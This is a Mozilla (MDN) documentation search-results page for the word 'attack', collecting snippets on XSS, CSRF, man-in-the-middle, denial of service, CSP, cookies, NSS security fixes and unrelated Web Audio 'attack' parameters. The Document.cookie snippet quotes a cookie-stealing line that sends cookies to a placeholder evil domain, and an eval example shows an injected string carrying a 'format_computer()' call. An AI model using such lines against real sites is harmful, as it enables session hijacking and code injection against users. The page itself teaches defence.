192 results for "attack":
Types of attacks - Web security
this article describes various types of security attacks and techniques to mitigate them.
...(click-jacking is sometimes called "user interface redressing", though this is a misuse of the term "redress".) cross-site request forgery (csrf) cross-site scripting (xss) cross-site scripting (xss) is a security exploit which allows an attacker to inject into a website malicious client-side code.
... this code is executed by the victims and lets the attackers bypass access controls and impersonate users.
DoS attack - MDN Web Docs Glossary: Definitions of Web-related terms
dos (denial of service) is a network attack that prevents legitimate use of server resources by flooding the server with requests.
...a dos attack consists of various techniques to exhaust these resources and make a server or a network unavailable to legitimate users, or at least make the server perform sluggishly.
... there are also distributed denial of service (ddos) attacks in which a multitude of servers are used to exhaust the computing capacity of an attacked computer.
DynamicsCompressorNode.attack - Web APIs
the attack property of the dynamicscompressornode interface is a k-rate audioparam representing the amount of time, in seconds, required to reduce the gain by 10 db.
... the attack property's default value is 0.003 and it can be set between 0 and 1.
... syntax: var audioCtx = new AudioContext(); var compressor = audioCtx.createDynamicsCompressor(); compressor.attack.value = 0; value: an AudioParam.
Website security - Learn web development
this introductory article won't make you a website security guru, but it will help you understand where threats come from, and what you can do to harden your web application against the most common attacks.
...with great regularity, we hear about websites becoming unavailable due to denial of service attacks, or displaying modified (and often damaging) information on their homepages.
... the purpose of website security is to prevent these (or any) sorts of attacks.
Index - MDN Web Docs Glossary: Definitions of Web-related terms
csp (glossary, http, infrastructure): a csp (content security policy) is used to detect and mitigate certain types of website related attacks like xss and data injections.
... csrf (glossary, security): csrf (cross-site request forgery) is an attack that impersonates a trusted user and sends a website unwanted commands.
...challenge-response protocols are one way to fight against replay attacks where an attacker listens to the previous messages and resends them at a later time to get the same credentials as the original message.
HTTP Index - HTTP
content security policy (csp) (csp, content security policy, reference, security): content security policy (csp) is an added layer of security that helps to detect and mitigate certain types of attacks, including cross site scripting (xss) and data injection attacks.
... these attacks are used for everything from data theft to site defacement to distribution of malware.
...this serves as an additional layer of protection above and beyond the same-origin policy which can mitigate speculative side channel attacks as well as cross-site script inclusion attacks.
Mixed content - Web security
when a user visits a page served over https, their connection with the web server is encrypted with tls and is therefore safeguarded from most sniffers and man-in-the-middle attacks.
...pages like this are only partially encrypted, leaving the unencrypted content accessible to sniffers and man-in-the-middle attackers.
...the difference lies in the threat level of the worst case scenario if content is rewritten as part of a man-in-the-middle attack.
Subdomain takeovers - Web security
a subdomain takeover occurs when an attacker gains control over a subdomain of a target domain.
...an attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it.
... if an attacker can do this, they can potentially read cookies set from the main domain, perform cross-site scripting, or circumvent content security policies, thereby enabling them to capture protected information (including logins) or send malicious content to unsuspecting users.
Distributed Denial of Service - MDN Web Docs Glossary: Definitions of Web-related terms
a distributed denial-of-service (ddos) is an attack in which many compromised systems are made to attack a single target, in order to swamp server resources and block legitimate users.
... normally many persons, using many bots, attack high-profile web servers like banks or credit-card payment gateways.
... in a typical ddos attack, the assailant begins by exploiting a vulnerability in one computer system and making it the ddos master.
sslfnc.html
ssl_rollback_detection disables detection of a rollback attack.
...you must turn this option off to interoperate with tls clients ( such as certain versions of microsoft internet explorer) that do not conform to the tls specification regarding rollback attacks.
... important: turning this option off means that your code will not comply with the tls 3.1 and ssl 3.0 specifications regarding rollback attack and will therefore be vulnerable to this form of attack.
Web security
the web security-oriented articles listed here provide information that may help you secure your site and its code from attacks and data theft.
... content security: content security policy (csp): content security policy (csp) is an added layer of security that helps to detect and mitigate certain types of attacks, including cross-site scripting (xss) and data injection attacks.
... these attacks are used for everything from data theft to site defacement to the distribution of malware.
Content Security Policy (CSP) - HTTP
content security policy (csp) is an added layer of security that helps to detect and mitigate certain types of attacks, including cross site scripting (xss) and data injection attacks.
... these attacks are used for everything from data theft to site defacement to distribution of malware.
...f the x-content-security-policy header, but that's an older version and you don't need to specify it anymore.) alternatively, the <meta> element can be used to configure a policy, for example:
<meta http-equiv="content-security-policy" content="default-src 'self'; img-src https://*; child-src 'none';">
threats: mitigating cross site scripting: a primary goal of csp is to mitigate and report xss attacks.
From object to iframe — other embedding technologies - Learn web development
browser makers and web developers have learned the hard way that iframes are a common target (official term: attack vector) for bad people on the web (often termed hackers, or more accurately, crackers) to attack if they are trying to maliciously modify your webpage, or trick people into doing something they don't want to do, such as reveal sensitive information like usernames and passwords.
... clickjacking is one kind of common iframe attack where hackers embed an invisible iframe into your document (or embed your document into their own malicious website) and use it to capture users' interactions.
... always use the sandbox attribute: you want to give attackers as little power as you can to do bad things on your website, therefore you should give embedded content only the permissions needed for doing its job.
Using HTTP cookies - HTTP
this technique helps prevent session fixation attacks, where a third party can reuse a user's session.
... a cookie with the secure attribute is sent to the server only with an encrypted request over the https protocol, never with unsecured http, and therefore can't easily be accessed by a man-in-the-middle attacker.
...this precaution helps mitigate cross-site scripting (xss) attacks.
Threats - Archive of obsolete content
threats may involve intentional actors (e.g., an attacker who wants to access information on a server) or unintentional actors (e.g., an administrator who forgets to disable user accounts of a former employee). threats can be local, such as a disgruntled employee, or remote, such as an attacker in another geographical area.
... a threat source is the cause of a threat, such as a hostile cyber or physical attack, a human error of omission or commission, a failure of organization-controlled hardware or software, or other failure beyond the control of the organization.
...the attacks often come in the form of instant messages or phishing emails which appear to be legitimate but are used to obtain personal information.
Vulnerabilities - Archive of obsolete content
an example is an input validation error, such as user-provided input not being properly evaluated for malicious character strings and overly long values associated with known attacks.
... another example is a race condition error that allows the attacker to perform a specific action with elevated privileges.
...an attacker could craft a fraudulent email message that contains hyperlinks that, when rendered in html, appear to the recipient to be benign but actually take the recipient to a malicious web site when they are clicked on.
Denial of Service - MDN Web Docs Glossary: Definitions of Web-related terms
dos (denial of service) is a network attack that prevents legitimate use of server resources by flooding the server with requests.
...a dos attack consists of various techniques to exhaust these resources and make a server or a network unavailable to legitimate users, or at least make the server perform sluggishly.
... there are also distributed denial of service (ddos) attacks in which a multitude of servers are used to exhaust the computing capacity of an attacked computer.
NSS 3.14.3 release notes
notable changes in nss 3.14.3: cve-2013-1620: recent research by nadhem alfardan and kenny patterson has highlighted a weakness in the handling of cbc padding as used in ssl, tls, and dtls that allows an attacker to exploit timing differences in mac processing.
... the details of their research and the attack can be found at http://www.isg.rhul.ac.uk/tls/, and has been referred to as "lucky thirteen".
... nss 3.14.3 includes changes to the softoken and ssl libraries to address and mitigate these attacks, contributed by adam langley of google.
Advanced techniques: Creating and sequencing audio - Web APIs
let's say our envelope has attack and release.
... we can allow the user to control these using range inputs on the interface:
<label for="attack">attack</label>
<input name="attack" id="attack" type="range" min="0" max="1" value="0.2" step="0.1" />
<label for="release">release</label>
<input name="release" id="release" type="range" min="0" max="1" value="0.5" step="0.1" />
now we can create some variables over in javascript and have them change when the input values are updated:
let attackTime = 0.2;
const attackControl = document.querySelector('#attack');
attackControl.addEventListener('input', function() { attackTime = Number(this.value); }, false);
let releaseTime = 0.5;
const releaseControl = document.querySelector('#release');
releaseControl.addEventListener('input', function() { releaseTime = Number(this.value); }, false);
...
... for our attack and release, we'll use the linearramptovalueattime method as mentioned above.
X-XSS-Protection - HTTP
the http x-xss-protection response header is a feature of internet explorer, chrome and safari that stops pages from loading when they detect reflected cross-site scripting (xss) attacks.
...if a cross-site scripting attack is detected, the browser will sanitize the page (remove the unsafe parts).
...rather than sanitizing the page, the browser will prevent rendering of the page if an attack is detected.
Securing your site - Web security
hash passwords using a secure algorithm (owasp): storing passwords in plain text can lead to attackers knowing and leaking the exact password of your site's users, potentially putting the users at risk.
... content security policy: an added layer of security that helps to detect and mitigate certain types of attacks, including cross site scripting (xss) and data injection attacks.
... these attacks are used for everything from data theft to site defacement or distribution of malware.
Security Controls - Archive of obsolete content
for example, if a system has a known vulnerability that attackers could exploit, the system should be patched so that the vulnerability is removed or mitigated.
...limiting functionality and resolving security weaknesses have a common goal: give attackers as few opportunities as possible to breach a system.
...think of phishing attacks.
... for example, sensitive data on a server may be protected from external attack by several controls, including a network-based firewall, a host-based firewall, and os patching.
Introduction to SSL - Archive of obsolete content
although the fourth question is not technically part of the ssl protocol, it is the client's responsibility to support this requirement, which provides some assurance of the server's identity and thus helps protect against a form of security attack known as "man in the middle." an ssl-enabled client goes through these steps to authenticate a server's identity: is today's date within the validity period?
...although step 4 is not technically part of the ssl protocol, it provides the only protection against a form of security attack known as "man in the middle." clients must perform this step and must refuse to authenticate the server or establish a connection if the domain names don't match.
... man-in-the-middle attack: as suggested in step 4 above, the client application must check the server domain name specified in the server certificate against the actual domain name of the server with which the client is attempting to communicate.
... this step is necessary to protect against a man-in-the-middle attack, which works as follows.
Cross-site scripting - MDN Web Docs Glossary: Definitions of Web-related terms
cross-site scripting (xss) is a security exploit which allows an attacker to inject into a website malicious client-side code.
... this code is executed by the victims and lets the attackers bypass access controls and impersonate users.
... these attacks succeed if the web app does not employ enough validation or encoding.
... learn more: general knowledge: cross-site scripting (xss); cross-site scripting on wikipedia; cross-site scripting on owasp; another article about cross-site scripting: xss attack – exploit & protection ...
Session Hijacking - MDN Web Docs Glossary: Definitions of Web-related terms
session hijacking occurs when an attacker takes over a valid session between two computers.
... the attacker steals a valid session id in order to break into the system and snoop data.
...in tcp session hijacking, an attacker gains access by taking over a tcp session between two machines in mid session.
... session hijacking occurs because of: no account lockout for invalid session ids; weak session-id generation algorithm; insecure handling; indefinite session expiration time; short session ids; transmission in plain text. session hijacking process: sniff, that is, perform a man-in-the-middle (mitm) attack, placing yourself between victim and server.
Phishing: a short definition
this email will usually contain a link pretending to lead to the original service, but in reality, taking the victim to an attacker-controlled website.
... past and current countermeasures: various technical and social approaches exist to combat phishing attacks.
...as most phishing attacks start with unsolicited email messages, a clear starting point is improving spam filters, thus reducing the number of fraudulent messages reaching users.
...this can be phished by an attacker, though with totp apps the attacker has limited time to make their unauthorized login.
sslerr.html
if this occurs frequently on a server, an active attack (such as the "million question" attack) may be underway against the server.
...this may indicate that an attack on that server is underway.
...if this occurs frequently on a server, an active attack (such as the "million question" attack) may be underway against the server.
...if encountered repeatedly on a server socket, this can indicate that the server is actively under a "million question" attack.
Lighting a WebXR setting - Web APIs
decoupling orientation from lighting: in an ar application that uses geolocation to determine orientation and potentially position information, avoiding having that information directly correlate to the state of the lighting is another way browsers can protect users from fingerprinting attacks.
... temporal and spatial filtering: consider an attack that uses a building's automated lighting system to flash the lights on and off quickly in a known pattern.
...this could be done remotely, or it could be performed by an attacker who's located in the same room but wants to determine if the other person is also in the same room.
... the lighting estimation api specification mandates that all user agents perform temporal and spatial filtering to fuzz the data in a manner that reduces its usefulness for the purpose of locating the user or performing side-channel attacks.
Index - HTTP
this helps guard against cross-site scripting attacks (xss).
... public-key-pins (hpkp, http, reference, security, header): the http public-key-pins response header associates a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.
...sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.
... x-xss-protection (http, reference, security, xss, header): the http x-xss-protection response header is a feature of internet explorer, chrome and safari that stops pages from loading when they detect reflected cross-site scripting (xss) attacks.
Index - Archive of obsolete content
for example, if a system has a known vulnerability that attackers could exploit, the system should be patched so that the vulnerability is removed or mitigated.
...limiting functionality and resolving security weaknesses have a common goal: give attackers as few opportunities as possible to breach a system.
...threats may involve intentional actors (e.g., an attacker who wants to access information on a server) or unintentional actors (e.g., an administrator who forgets to disable user accounts of a former employee). threats can be local, such as a disgruntled employee, or remote, such as an attacker in another geographical area.
Confidentiality, Integrity, and Availability - Archive of obsolete content
now imagine that an attacker can shop on your web site and maliciously alter the prices of your products, so that they can buy anything for whatever price they choose.
...another example of a failure of integrity is when you try to connect to a website and a malicious attacker between you and the website redirects your traffic to a different website.
...if an attacker is not able to compromise the first two elements of information security (see above) they may try to execute attacks like denial of service that would bring down the server, making the website unavailable to legitimate users due to lack of availability.
Encryption and Decryption - Archive of obsolete content
manually finding the key to break an algorithm is called a brute force attack.
... the key strength of an algorithm is determined by finding the fastest method to break the algorithm and comparing it to a brute force attack.
...(for more information about rc4 and other ciphers used with ssl, see "introduction to ssl.") an encryption key is considered full strength if the best known attack to break the key is no faster than a brute force attempt to test every key possibility.
MitM - MDN Web Docs Glossary: Definitions of Web-related terms
a man-in-the-middle attack (mitm) intercepts a communication between two systems.
... in physical mail and in online communication, mitm attacks are tough to defend.
... learn more: owasp article: man-in-the-middle attack; wikipedia: man-in-the-middle attack. the public-key-pins header (hpkp) can significantly decrease the risk of mitm by instructing browsers to require a whitelisted certificate for all subsequent connections to that website.
JSAPI User Guide
unless you also regularly deploy spidermonkey security updates, a determined hacker could use publicly known bugs in the engine to attack your application.
... note that the kind of attack we're talking about here is where a hacker uses javascript to attack the c++ code of the engine itself (or your embedding).
... block simple denial-of-service attacks - a program like while(true){} should not hang your application.
Secure Development Guidelines
basic registers (eax, ebx, ecx, edx, edi, esi); 2 stack-related registers (esp, ebp) mark top and bottom of current stack frame; status register (eflags) contains various state information; instruction pointer (eip) points to register being executed, can't be modified directly. introduction: gaining control (2): eip is modified using call or jump instructions; attacks usually rely on obtaining control over the eip, otherwise the attacker can try to control memory pointed to by an existing function pointer; a vulnerability is required to modify the eip or sensitive memory (saved return addr or function pointer get altered). introduction: gaining control (3): common issues used to gain control: buffer overflows, format string bugs, integer overflows/...
...ation: most vulnerabilities are a result of un-validated input; always perform input validation, it could save you without knowing it. examples: if it doesn't have to be negative, store it in an unsigned int; if the input doesn't have to be > 512, cut it off there; if the input should only be [a-za-z0-9], enforce it. cross site scripting (xss): xss is a type of code injection attack, typically occurs in web applications; injection of arbitrary data into an html document from another site; victim's browser executes those html instructions; could be used to steal user credentials (think: webmail, online auction, cms, online banking...)
... to the user. html encoding: &amp; → &, &lt; → <, &gt; → >, &quot; → ", &apos; → '. url encoding: % encoding. java/vbscript escaping: depends on the context; in a single-quoted string, escaping ' would suffice. sql injection: occurs when un-trusted input is mixed with a sql string; sql is a language used to interact with databases; code injection attack that is similar to xss but targeted at sql rather than html and javascript; if input is mixed with sql, it could itself become an sql instruction and be used to: query data from the database (passwords); insert value into the database (a user account); change application logic based on results returned by the database. sql injection: example: snprintf(str, sizeof(str), "...
SubtleCrypto.encrypt() - Web APIs
the web crypto api supports three different aes modes: ctr (counter mode); cbc (cipher block chaining); gcm (galois/counter mode). it's strongly recommended to use authenticated encryption, which includes checks that the ciphertext has not been modified by an attacker.
... authentication helps protect against chosen-ciphertext attacks, in which an attacker can ask the system to decrypt arbitrary messages, and use the result to deduce information about the secret key.
... one major difference between this mode and the others is that gcm is an "authenticated" mode, which means that it includes checks that the ciphertext has not been modified by an attacker.
Strict-Transport-Security - HTTP
this creates an opportunity for a man-in-the-middle attack.
... note: the strict-transport-security header is ignored by the browser when your site is accessed using http; this is because an attacker may intercept http connections and inject the header or remove it.
... strict transport security resolves this problem; as long as you've accessed your bank's web site once using https, and the bank's web site uses strict transport security, your browser will know to automatically use only https, which prevents hackers from performing this sort of man-in-the-middle attack.
Planned changes to shared memory - JavaScript
these changes provide further isolation between sites and help reduce the impact of attacks with high-resolution timers, which can be created with shared memory.
... for top-level documents, two headers will need to be set: cross-origin-opener-policy with same-origin as value (protects your origin from attackers); cross-origin-embedder-policy with require-corp as value (protects victims from your origin). with these two headers set, postmessage() will no longer throw for sharedarraybuffer objects and shared memory across threads is therefore available.
...note that setting the cross-origin-resource-policy header to any other value than same-origin opens up the resource to potential attacks, such as spectre.
Privacy, permissions, and information security
modern browsers take steps to help prevent fingerprinting-based attacks by either not allowing information to be accessed or, where the information must be made available, by introducing variations that prevent it from being used for identification purposes.
... certificate transparency: an open standard for monitoring and auditing certificates, creating a database of public logs that can be used to help identify incorrect or malicious certificates; content security policy: provides the ability to define the extent to which a document's content can be accessed by other devices over the web, used in particular to prevent or mitigate attacks on the server; feature policy: lets web developers selectively enable, disable, and modify the behavior of certain features and apis both for a document and for subdocuments loaded in <iframe>s; <iframe>'s allow attribute: technically part of feature policy, the allow attribute on an <iframe> specifies which web features the document in the frame should be allowed to access ...
... http public key pinning (hpkp): hpkp is used by servers to instruct a client to associate a specific public key with the server going forward in order to decrease the likelihood of man-in-the-middle attacks; http strict transport security (hsts): hsts is used by servers to let them protect themselves from protocol downgrade and cookie hijack attacks by letting sites tell clients that they can only use https to communicate with the server; http/2: while http/2 technically does not have to use encryption, most browser developers are only supporting it when used with https, so it can be thought of in that regard as being security-related; permissions api: provides a way to determine the status of permissions for the current browser context; transport ...
Insecure passwords - Web security
serving login forms over http is especially dangerous because of the wide variety of attacks that can be used against them to extract a user’s password.
...websites that handle user data should use https to protect their users from attackers.
...attackers are getting smarter; they steal username/password pairs from one site and then try reusing them on more lucrative sites.
Appendix C: Avoiding using eval in Add-ons - Archive of obsolete content
if using an unencrypted, insecure connection, a man-in-the-middle attacker might replace the json with attack code before it arrives at the user.
...setTimeout("alert('" + xhr.responseText + "');", 100);
// attacker manipulated responseText to contain "attack!'); format_computer(); alert('done"
setTimeout("alert('attack!'); format_computer(); alert('done');", 100);
as a general rule of thumb, just don't pass code around as strings and execute it by calling eval, setTimeout and friends.
Cipher - MDN Web Docs Glossary: Definitions of Web-related terms
modern ciphers are designed to withstand attacks discovered by a cryptanalyst.
... there is no guarantee that all attack methods have been discovered, but each algorithm is judged against known classes of attacks.
MDN Web Docs Glossary: Definitions of Web-related terms
descriptor (css) deserialization developer tools dhtml digest digital certificate distributed denial of service dmz dns doctype document directive document environment dom (document object model) domain domain name domain sharding dominator dos attack dtls (datagram transport layer security) dtmf (dual-tone multi-frequency signaling) dynamic programming language dynamic typing e ecma ecmascript effective connection type element empty element encapsulation encryption endianness engine entity enti...
...webp webrtc websockets webvtt whatwg whitespace world wide web wrapper x xforms xhr (xmlhttprequest) xhtml xinclude xlink xml xpath xquery xslt other 404 502 alpn at-rule attack byte-order mark character set client cryptosystem debug digital signature execution flex-direction glsl interface library memory management routers self-executing anonymous function stylesheet vector image ...
Sending form data - Learn web development
html forms are by far the most common server attack vectors (places where attacks can occur).
... the website security article of our server-side learning topic discusses a number of common attacks and potential defences against them in detail.
Server-side web frameworks - Learn web development
html, json, xml), and improving security against web attacks.
... web security: some web frameworks provide better support for handling common web attacks.
Mozilla Port Blocking
background: on 08/15/2001, cert issued a vulnerability note vu#476267 for a "cross-protocol" scripting attack, known as the html form protocol attack, which allowed sending arbitrary data to most tcp ports.
... a simple exploit of this hole allows an attacker to send forged unsigned mail through a mail server behind your firewall: a really nasty hole.
An overview of NSS Internals
often freeing is combined with immediately erasing (zeroing, zfree) the memory associated to the arena, in order to make it more difficult for attackers to extract keys from a memory dump.
...as soon as you set a master password, an attacker stealing your key database will no longer be able to get access to your private key, unless the attacker would also succeed in stealing the master password.
Index
often freeing is combined with immediately erasing (zeroing, zfree) the memory associated to the arena, in order to make it more difficult for attackers to extract keys from a memory dump.
...as soon as you set a master password, an attacker stealing your key database will no longer be able to get access to your private key, unless the attacker would also succeed in stealing the master password.
NSS 3.19.2.1 release notes
an attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.19.4 release notes
an attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.20.1 release notes
an attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow attackers to bypass security checks and obtain control of arbitrary memory.
NSS 3.24 release notes
update nss to protect it against the cachebleed attack.
... bugs fixed in nss 3.24 this bugzilla query returns all the bugs fixed in nss 3.24: https://bugzilla.mozilla.org/buglist.cgi?resolution=fixed&classification=components&query_format=advanced&product=nss&target_milestone=3.24 acknowledgements the nss development team would like to thank yuval yarom for responsibly disclosing the cachebleed attack by providing advance copies of their research.
JS::CompileOptions
this allows an attack by which a malicious website loads a sensitive file (say, a bank statement) cross-origin (using the user's cookies), and sniffs the generated syntax errors (via a window.onerror handler) for juicy morsels of its contents.
... to counter this attack, html5 specifies that script errors should be sanitized ("muted") when the script is not same-origin with the global for which it is loaded.
JSErrorReport
this allows an attack by which a malicious website loads a sensitive file (say, a bank statement) cross-origin (using the user's cookies), and sniffs the generated syntax errors (via a window.onerror handler) for juicy morsels of its contents.
... to counter this attack, html5 specifies that script errors should be sanitized ("muted") when the script is not same-origin with the global for which it is loaded.
Handling Mozilla Security Bugs
background security vulnerabilities are different from other bugs, because their consequences are potentially so severe: users' private information (including financial information) could be exposed, users' data could be destroyed, and users' systems could be used as platforms for attacks on other systems.
...we understand and acknowledge the concerns of those who believe that too-hasty disclosure of exploit details can provide a short-term advantage to potential attackers, who can exploit a problem before most end users become aware of its existence.
Xray vision
if chrome-privileged code is compromised, the attacker can take over the user's computer.
...so this is not a straightforward privilege escalation attack, although it might lead to one if the chrome code is sufficiently confused.
Mozilla
mozilla port blocking on 08/15/2001, cert issued a vulnerability note vu#476267 for a "cross-protocol" scripting attack, known as the html form protocol attack which allowed sending arbitrary data to most tcp ports.
... a simple exploit of this hole allows an attacker to send forged unsigned mail through a mail server behind your firewall: a really nasty hole.
DOMHighResTimeStamp - Web APIs
also note the section below on reduced time precision controlled by browser preferences to avoid timing attacks and fingerprinting.
... reduced time precision to offer protection against timing attacks and fingerprinting, the precision of time stamps might get rounded depending on browser settings.
Document.cookie - Web APIs
this is sufficient for user tracking, but it will prevent many csrf attacks.
...common ways to steal cookies include using social engineering or by exploiting an xss vulnerability in the application - (new image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie; the httponly cookie attribute can help to mitigate this attack by preventing access to cookie value through javascript.
DynamicsCompressorNode - Web APIs
dynamicscompressornode.attack read only is a k-rate audioparam representing the amount of time, in seconds, required to reduce the gain by 10 db.
... a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
Element.innerHTML - Web APIs
there is potential for this to become an attack vector on a site, creating a potential security risk.
... name = "<script>alert('i am john in an annoying alert!')</script>"; el.innerhtml = name; // harmless in this case although this may look like a cross-site scripting attack, the result is harmless.
Index - Web APIs
1057 dynamicscompressornode() audio, constructor, dynamicscompressornode, media, web audio api the dynamicscompressornode() constructor creates a new dynamicscompressornode object which provides a compression effect, which lowers the volume of the loudest parts of the signal 1058 dynamicscompressornode.attack api, attack, dynamicscompressornode, property, reference, web audio api an audioparam.
...although the window.crypto property itself is read-only, all of its methods (and the methods of its child object, subtlecrypto) are not read-only, and therefore vulnerable to attack by polyfill.
performance.now() - Web APIs
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of performance.now() might get rounded depending on browser settings.
...coop process-isolates your document and potential attackers can't access your global object if they were opening it in a popup, preventing a set of cross-origin attacks dubbed xs-leaks.
window.postMessage() - Web APIs
shared memory is gated behind two http headers: cross-origin-opener-policy with same-origin as value (protects your origin from attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) cross-origin-opener-policy: same-origin cross-origin-embedder-policy: require-corp to check if cross origin isolation has been successful, you can test against the crossoriginisolated property available to window and worker contexts: if (crossoriginisolated) { // post sharedarraybuffer } else {...
...this cannot be overstated: failure to check the origin and possibly source properties enables cross-site scripting attacks.
Set-Cookie - HTTP
this mitigates attacks against cross-site scripting (xss).
... asserts that a cookie must not be sent with cross-origin requests, providing some protection against cross-site request forgery attacks (csrf).
HTTP headers - HTTP
x-download-options the x-download-options http header indicates that the browser (internet explorer) should not display the option to "open" a file that has been downloaded from an application, to prevent phishing attacks as the file otherwise would gain access to execute in the context of the application.
... public-key-pins associates a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.
HTTP Public Key Pinning (HPKP) - HTTP
http public key pinning (hpkp) was a security feature that used to tell a web client to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.
...if an attacker is able to compromise a single ca, they can perform mitm attacks on various tls connections.
Secure contexts - Web security
the primary goal of secure contexts is to prevent mitm attackers from accessing powerful apis that could further compromise the victim of an attack.
... some apis on the web are very powerful, giving an attacker the ability to do the following and more: invade a user's privacy.
Subresource Integrity - Web security
however, using cdns also comes with a risk, in that if an attacker gains control of a cdn, the attacker can inject arbitrary malicious content into files on the cdn (or replace the files completely) and thus can also potentially attack all sites that fetch files from that cdn.
... subresource integrity enables you to mitigate some risks of attacks such as this, by ensuring that the files your web application or web document fetches (from a cdn or anywhere) have been delivered without a third-party having injected any additional content into those files — and without any other changes of any kind at all having been made to those files.
Transport Layer Security - Web security
though the performance gains from 0-rtt can be significant, they come with some risk of replay attack, so some care is needed before enabling this feature.
...enabling 0-rtt requires additional steps, both to ensure successful deployment and to manage the risks of replay attacks.
Weak signature algorithms - Web security
weaknesses in hash algorithms can lead to situations in which attackers can create or obtain fraudulent certificates.
... as new attacks are found and improvements in available technology make attacks more feasible, the use of older algorithms is discouraged and support for them is eventually removed.
SDK and XUL Comparison - Archive of obsolete content
security if they're not carefully designed, firefox add-ons can open the browser to attack by malicious web pages.
Extension Versioning, Update and Compatibility - Archive of obsolete content
securing updates gecko 1.9 has added additional requirements designed to protect users from man-in-the-middle attacks and the like during add-on updates.
Connecting to Remote Content - Archive of obsolete content
you would of course need to be very careful about escaping characters and protecting yourself against sql injection attacks.
Appendix E: DOM Building and Insertion (HTML & XUL) - Archive of obsolete content
failure to do so can lead to execution of remote scripts, and in the worst cases to privilege escalation which can leave a user's pc open to remote attack.
Security best practices in extensions - Archive of obsolete content
non-chrome urls in chrome xul or html such as the following example are not allowed: <script type="text/javascript" src="http://mysite.greatsite.com/js/wow-content.js" /> in general, scripts that are from remote sources that run in the chrome context are not acceptable, as many times the source of the script can never be 100% guaranteed, and they are vulnerable to man-in-the-middle attacks.
XUL Questions and Answers - Archive of obsolete content
support for non-rdf datasources for xul template is planned (bug 321170): xml datasources (bug 321171) storage (sqlite) datasources (bug 321172) when loading an xslt stylesheet into an xml i get the error: "error loading stylesheet: an xslt stylesheet load was blocked for security reasons." that error is from a security check that has been put up to safeguard against cross-site-scripting attacks.
Introduction to Public-Key Cryptography - Archive of obsolete content
for an overview of ssl, see "introduction to ssl." for an overview of encryption and decryption, see "encryption and decryption." information on digital signatures is available from "digital signatures." public-key cryptography is a set of well-established techniques and standards for protecting communications from eavesdropping, tampering, and impersonation attacks.
CSP - MDN Web Docs Glossary: Definitions of Web-related terms
a csp (content security policy) is used to detect and mitigate certain types of website related attacks like xss and data injections.
CSRF - MDN Web Docs Glossary: Definitions of Web-related terms
csrf (cross-site request forgery) is an attack that impersonates a trusted user and sends a website unwanted commands.
Cryptographic hash function - MDN Web Docs Glossary: Definitions of Web-related terms
tible (each digest could come from a very large number of messages, and only brute-force can generate a message that leads to a given digest) tamper-resistant (any change to a message leads to a different digest) collision-resistant (it should be impossible to find two different messages that produce the same digest) cryptographic hash functions such as md5 and sha-1 are considered broken, as attacks have been found that significantly reduce their collision resistance.
DMZ - MDN Web Docs Glossary: Definitions of Web-related terms
learn more general knowledge dmz on wikipedia learn about it web servers and firewall - maximum security against attack on mdn ...
HPKP - MDN Web Docs Glossary: Definitions of Web-related terms
http public key pinning (hpkp) is a security feature that tells a web client to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.
Placeholder names - MDN Web Docs Glossary: Definitions of Web-related terms
placeholder names are commonly used in cryptography to indicate the participants in a conversation, without resorting to terminology such as "party a," "eavesdropper," and "malicious attacker." the most commonly used names are: alice and bob, two parties who want to send messages to each other, occasionally joined by carol, a third participant eve, a passive attacker who is eavesdropping on alice and bob's conversation mallory, an active attacker ("man-in-the-middle") who is able to modify their conversation and replay old messages ...
Random Number Generator - MDN Web Docs Glossary: Definitions of Web-related terms
these include: that it's computationally unfeasible for an attacker (without knowledge of the seed) to predict its output that if an attacker can work out its current state, this should not enable the attacker to work out previously emitted numbers.
RTP (Real-time Transport Protocol) and SRTP (Secure RTP) - MDN Web Docs Glossary: Definitions of Web-related terms
the secure version of rtp, srtp, is used by webrtc, and uses encryption and authentication to minimize the risk of denial-of-service attacks and security breaches.
Same-origin policy - MDN Web Docs Glossary: Definitions of Web-related terms
it helps isolate potentially malicious documents, reducing possible attack vectors.
Challenge-response authentication - MDN Web Docs Glossary: Definitions of Web-related terms
challenge-response protocols are one way to fight against replay attacks where an attacker listens to the previous messages and resends them at a later time to get the same credentials as the original message.
Introduction to client-side frameworks - Learn web development
there are a number of advantages of this approach, mostly around performance (your user's device isn’t building the page with javascript; it's already complete) and security (static pages have fewer attack vectors).
Experimental features in Firefox
nightly 81 yes developer edition — — beta — — release — — preference name — security and privacy block plain text requests from flash on encrypted pages in order to help mitigate man-in-the-middle (mitm) attacks caused by flash content on encrypted pages, a preference has been added to treat object_subrequests as active content.
Script security
if the code is compromised, the attacker can take over the user's computer.
Localization content best practices
example: this web page at <span id='malware_sitename'/> has been reported as an attack page and has been blocked based on your security preferences.
Mozilla Development Strategies
since they are going to be reviewing your code later, run your plan of attack by them first.
Gecko Profiler FAQ
you’ll probably want to accumulate costs that are somehow “similar” or “in the same bucket” but distributed over different parts of the call tree / time line, and then attack the biggest bucket.
NSS FAQ
it contains bugs that were never fixed, doesn't support tls or the new 56-bit export cipher suites, and does not contain the fix to the bleichenbacher attack on pkcs#1.
NSS 3.12.5 release_notes
